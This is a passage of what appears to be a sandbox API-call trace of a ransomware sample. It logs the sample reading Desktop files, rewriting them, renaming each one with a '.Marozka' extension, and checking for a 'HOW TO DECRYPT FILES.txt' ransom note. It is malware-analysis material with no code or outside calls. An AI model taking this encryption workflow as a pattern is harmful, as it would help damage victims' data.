lpOverlapped=0x0 | out: lpBuffer=0x27f2d78*, lpNumberOfBytesWritten=0x5beab0*=0x10410, lpOverlapped=0x0) returned 1 [0046.309] CloseHandle (hObject=0x2e0) returned 1 [0046.316] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt", lpFilePart=0x0) returned 0x2e [0046.316] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt.Marozka", lpFilePart=0x0) returned 0x36 [0046.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0046.316] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\zyg16so2lwlhdhrdfa.ppt"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff66b080, ftCreationTime.dwHighDateTime=0x1d4d427, ftLastAccessTime.dwLowDateTime=0xb1651280, ftLastAccessTime.dwHighDateTime=0x1d4d1f9, ftLastWriteTime.dwLowDateTime=0xde55d7a4, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x10410)) returned 1 [0046.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0046.316] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\zyg16so2lwlhdhrdfa.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\ZyG16so2LwLHdHrDfA.ppt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\zyg16so2lwlhdhrdfa.ppt.marozka")) returned 1 [0046.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0046.436] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH", lpFilePart=0x0) returned 0x2c [0046.436] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0x77c96e0 [0046.437] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.437] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.437] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.437] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.437] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.438] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.438] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.438] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.438] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.438] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.438] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.439] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.439] FindNextFileW (in: hFindFile=0x77c96e0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0046.439] FindClose (in: hFindFile=0x77c96e0 | out: hFindFile=0x77c96e0) returned 1 [0046.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0046.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0046.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0046.439] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH", lpFilePart=0x0) returned 0x2c [0046.439] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0x77c9de0 [0046.440] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.440] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.440] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.440] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.440] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.441] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.441] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.441] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.441] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.442] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.442] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.442] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0046.442] FindNextFileW (in: hFindFile=0x77c9de0, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0046.442] FindClose (in: hFindFile=0x77c9de0 | out: hFindFile=0x77c9de0) returned 1 [0046.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0046.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0046.443] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp", lpFilePart=0x0) returned 0x40 [0046.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0046.443] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\9st-pupqzjelkra.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0046.443] GetFileType (hFile=0x2e0) returned 0x1 [0046.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0046.443] GetFileType (hFile=0x2e0) returned 0x1 [0046.443] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0xd216 [0046.443] ReadFile (in: hFile=0x2e0, lpBuffer=0x2806694, nNumberOfBytesToRead=0xd216, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x2806694*, lpNumberOfBytesRead=0x5bea48*=0xd216, lpOverlapped=0x0) returned 1 [0046.445] CloseHandle (hObject=0x2e0) returned 1 [0046.594] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0046.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0046.594] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0046.594] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp", lpFilePart=0x0) returned 0x40 [0046.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0046.595] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\9st-pupqzjelkra.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0046.650] GetFileType (hFile=0x2e0) returned 0x1 [0046.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0046.650] GetFileType (hFile=0x2e0) returned 0x1 [0046.650] WriteFile (in: hFile=0x2e0, lpBuffer=0x2688aa4*, nNumberOfBytesToWrite=0xd220, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x2688aa4*, lpNumberOfBytesWritten=0x5bea3c*=0xd220, lpOverlapped=0x0) returned 1 [0046.652] CloseHandle (hObject=0x2e0) returned 1 [0046.712] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp", lpFilePart=0x0) returned 0x40 [0046.712] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp.Marozka", lpFilePart=0x0) returned 0x48 [0046.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0046.713] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\9st-pupqzjelkra.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a25d8c0, ftCreationTime.dwHighDateTime=0x1d4d2a8, ftLastAccessTime.dwLowDateTime=0xc9ff0760, ftLastAccessTime.dwHighDateTime=0x1d4c98e, ftLastWriteTime.dwLowDateTime=0xde8a4b3f, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xd220)) returned 1 [0046.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0046.713] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\9st-pupqzjelkra.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\9ST-pUPqzJeLkRa.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\9st-pupqzjelkra.bmp.marozka")) returned 1 [0046.885] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg", lpFilePart=0x0) returned 0x36 [0046.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0046.885] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\c3t5a.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0046.885] GetFileType (hFile=0x2e0) returned 0x1 [0046.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0046.885] GetFileType (hFile=0x2e0) returned 0x1 [0046.885] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x113fd [0046.886] ReadFile (in: hFile=0x2e0, lpBuffer=0x2696248, nNumberOfBytesToRead=0x113fd, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x2696248*, lpNumberOfBytesRead=0x5bea48*=0x113fd, lpOverlapped=0x0) returned 1 [0046.887] CloseHandle (hObject=0x2e0) returned 1 [0046.916] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0046.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0046.916] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0046.917] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg", lpFilePart=0x0) returned 0x36 [0046.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0046.917] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\c3t5a.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0046.987] GetFileType (hFile=0x2e0) returned 0x1 [0046.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0046.988] GetFileType (hFile=0x2e0) returned 0x1 [0046.988] WriteFile (in: hFile=0x2e0, lpBuffer=0x2716da4*, nNumberOfBytesToWrite=0x11400, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x2716da4*, lpNumberOfBytesWritten=0x5bea3c*=0x11400, lpOverlapped=0x0) returned 1 [0046.990] CloseHandle (hObject=0x2e0) returned 1 [0047.012] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg", lpFilePart=0x0) returned 0x36 [0047.012] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg.Marozka", lpFilePart=0x0) returned 0x3e [0047.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0047.012] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\c3t5a.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42652610, ftCreationTime.dwHighDateTime=0x1d4c5b3, ftLastAccessTime.dwLowDateTime=0x4317c830, ftLastAccessTime.dwHighDateTime=0x1d4d0bf, ftLastWriteTime.dwLowDateTime=0xdebed828, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x11400)) returned 1 [0047.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0047.012] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\c3t5a.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\c3T5A.jpg.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\c3t5a.jpg.marozka")) returned 1 [0047.031] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi", lpFilePart=0x0) returned 0x3e [0047.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0047.031] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\dq4wuk f0_ipo.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0047.031] GetFileType (hFile=0x2e0) returned 0x1 [0047.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0047.031] GetFileType (hFile=0x2e0) returned 0x1 [0047.031] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x18d0b [0047.049] ReadFile (in: hFile=0x2e0, lpBuffer=0x3641a68, nNumberOfBytesToRead=0x18d0b, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x3641a68*, lpNumberOfBytesRead=0x5bea48*=0x18d0b, lpOverlapped=0x0) returned 1 [0047.051] CloseHandle (hObject=0x2e0) returned 1 [0047.351] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0047.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0047.351] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0047.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0047.351] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi", lpFilePart=0x0) returned 0x3e [0047.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0047.351] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\dq4wuk f0_ipo.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0047.381] GetFileType (hFile=0x2e0) returned 0x1 [0047.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0047.381] GetFileType (hFile=0x2e0) returned 0x1 [0047.381] WriteFile (in: hFile=0x2e0, lpBuffer=0x36bdbf0*, nNumberOfBytesToWrite=0x18d10, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x36bdbf0*, lpNumberOfBytesWritten=0x5bea3c*=0x18d10, lpOverlapped=0x0) returned 1 [0047.384] CloseHandle (hObject=0x2e0) returned 1 [0047.404] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi", lpFilePart=0x0) returned 0x3e [0047.404] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi.Marozka", lpFilePart=0x0) returned 0x46 [0047.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0047.404] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\dq4wuk f0_ipo.avi"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1b6ae80, ftCreationTime.dwHighDateTime=0x1d4d59b, ftLastAccessTime.dwLowDateTime=0x6707b3c0, ftLastAccessTime.dwHighDateTime=0x1d4d0d0, ftLastWriteTime.dwLowDateTime=0xdefa5a27, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x18d10)) returned 1 [0047.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0047.404] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\dq4wuk f0_ipo.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\DQ4wUK F0_iPo.avi.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\dq4wuk f0_ipo.avi.marozka")) returned 1 [0047.459] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt", lpFilePart=0x0) returned 0x3c [0047.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0047.459] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\k9h1cuco yc.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0047.459] GetFileType (hFile=0x2e0) returned 0x1 [0047.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0047.459] GetFileType (hFile=0x2e0) returned 0x1 [0047.459] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x6b02 [0047.459] ReadFile (in: hFile=0x2e0, lpBuffer=0x2679648, nNumberOfBytesToRead=0x6b02, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x2679648*, lpNumberOfBytesRead=0x5bea48*=0x6b02, lpOverlapped=0x0) returned 1 [0047.460] CloseHandle (hObject=0x2e0) returned 1 [0047.491] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT 